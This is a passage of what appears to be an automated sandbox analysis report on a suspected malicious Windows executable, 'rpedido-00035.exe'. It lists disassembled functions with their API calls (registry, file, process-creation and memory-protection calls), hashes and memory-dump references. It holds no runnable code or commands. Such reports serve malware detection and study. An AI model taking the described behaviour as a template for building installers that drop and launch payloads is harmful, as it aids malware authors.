                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                          • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                          • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                          • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                          Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteValue
                                                          • String ID:
                                                          • API String ID: 2831762973-0
                                                          • Opcode ID: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                          • Instruction ID: eeebe11236d86b478005370e27fb04b66889edd8f93d7ff1d49de92df4b57ee5
                                                          • Opcode Fuzzy Hash: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                          • Instruction Fuzzy Hash: 58F09632A04114DBE711BBA49B4EABEB2A59B44354F16053FFA02F71C1DEFC4D41866D
                                                          Function 0040678A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                            • Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                            • Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
                                                            • Part of subcall function 0040671A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                          • Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
                                                          • Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                          • Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D
                                                          Function 00405EA2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00405EA6
                                                          • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405EC8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                          • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                          • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                          • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                          Function 00405960 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76B73420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                          • Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
                                                          • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                          • Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D
                                                          Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                            • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FilePointerwsprintf
                                                          • String ID:
                                                          • API String ID: 327478801-0
                                                          • Opcode ID: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                          • Instruction ID: 55fb61e46e544c01c8f838511187bb9fe83791c0a23b57862087ec8cac53259a
                                                          • Opcode Fuzzy Hash: df39207a0041021f90c9c5904dee6126a22bdfdf8dd6c18872903947b59110e0
                                                          • Instruction Fuzzy Hash: EDE09271A00104AFDB11EBA5AF499AE7779DB80304B14407FF501F11D2CB790D52DE2E
                                                          Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWrite
                                                          • String ID:
                                                          • API String ID: 390214022-0
                                                          • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                          • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                          • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                          • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                          Function 0040624B Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406274
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction ID: 479e159ceda2cb7b50184963f42fe168e38793edbf0b306f3e9e40cefa011f94
                                                          • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                          • Instruction Fuzzy Hash: F5E0E672010109BEEF195F50DD0AD7B371DE704314F01452EFA07E4051E6B5A9305734
                                                          Function 00405F54 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F7DB,0040CED0,004033C2,0040CED0,0040F7DB,00414ED0,00004000,?,00000000,004031EC,00000004), ref: 00405F68
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction ID: 6078229a914e39b74a0c5ece066be2a5834b756046c3aff4b734283800ecbe33
                                                          • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                          • Instruction Fuzzy Hash: 2DE0EC3221065EABDF109EA59C00EEB7B6CFB053A0F004437FD25E3150D775E9219BA8
                                                          Function 00405F25 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040343E,0040A230,0040A230,00403342,00414ED0,00004000,?,00000000,004031EC), ref: 00405F39
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction ID: 9b2ea83f702eb3fffeb4c264c614e4c5cb206e28bf88f3110778221d7db1fef5
                                                          • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                          • Instruction Fuzzy Hash: D7E08C3220021AEBCF109F508C00EEB3B6CEB04360F004472F925E2180E234E8219FA8
                                                          Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                          • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                          • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                          Function 0040621D Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062AB,00422708,00000000,?,?,Call,?), ref: 00406241
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction ID: 3024dc78f91217c8ac754af2bee00b96045fdb9f0f4599777b3fb0e88d8c22ab
                                                          • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                          • Instruction Fuzzy Hash: 8AD0123200020DBBDF116E919D05FAB371DEB04310F014426FE16A4091D775D530AB15
                                                          Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
                                                          • Instruction ID: 608ef69ca2b13f27eda1cfcd16162797e0d7c1effb02ba883df1ee114d760796
                                                          • Opcode Fuzzy Hash: 29d25e4036f002882842ff2abbc33b1b61682e4b1f0e1c41cb6674e83b655918
                                                          • Instruction Fuzzy Hash: 44D01272B04104DBDB21DBA4AF0859D73A59B10364B204677E101F11D1DAB989559A1D
                                                          Function 00403441 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                          • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                          • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                          Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                            • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                            • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                            • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                            • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                            • Part of subcall function 00405995: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                            • Part of subcall function 00405995: CloseHandle.KERNEL32(?), ref: 004059CB
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                            • Part of subcall function 0040683B: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040684C
                                                            • Part of subcall function 0040683B: GetExitCodeProcess.KERNEL32(?,?), ref: 0040686E
                                                            • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
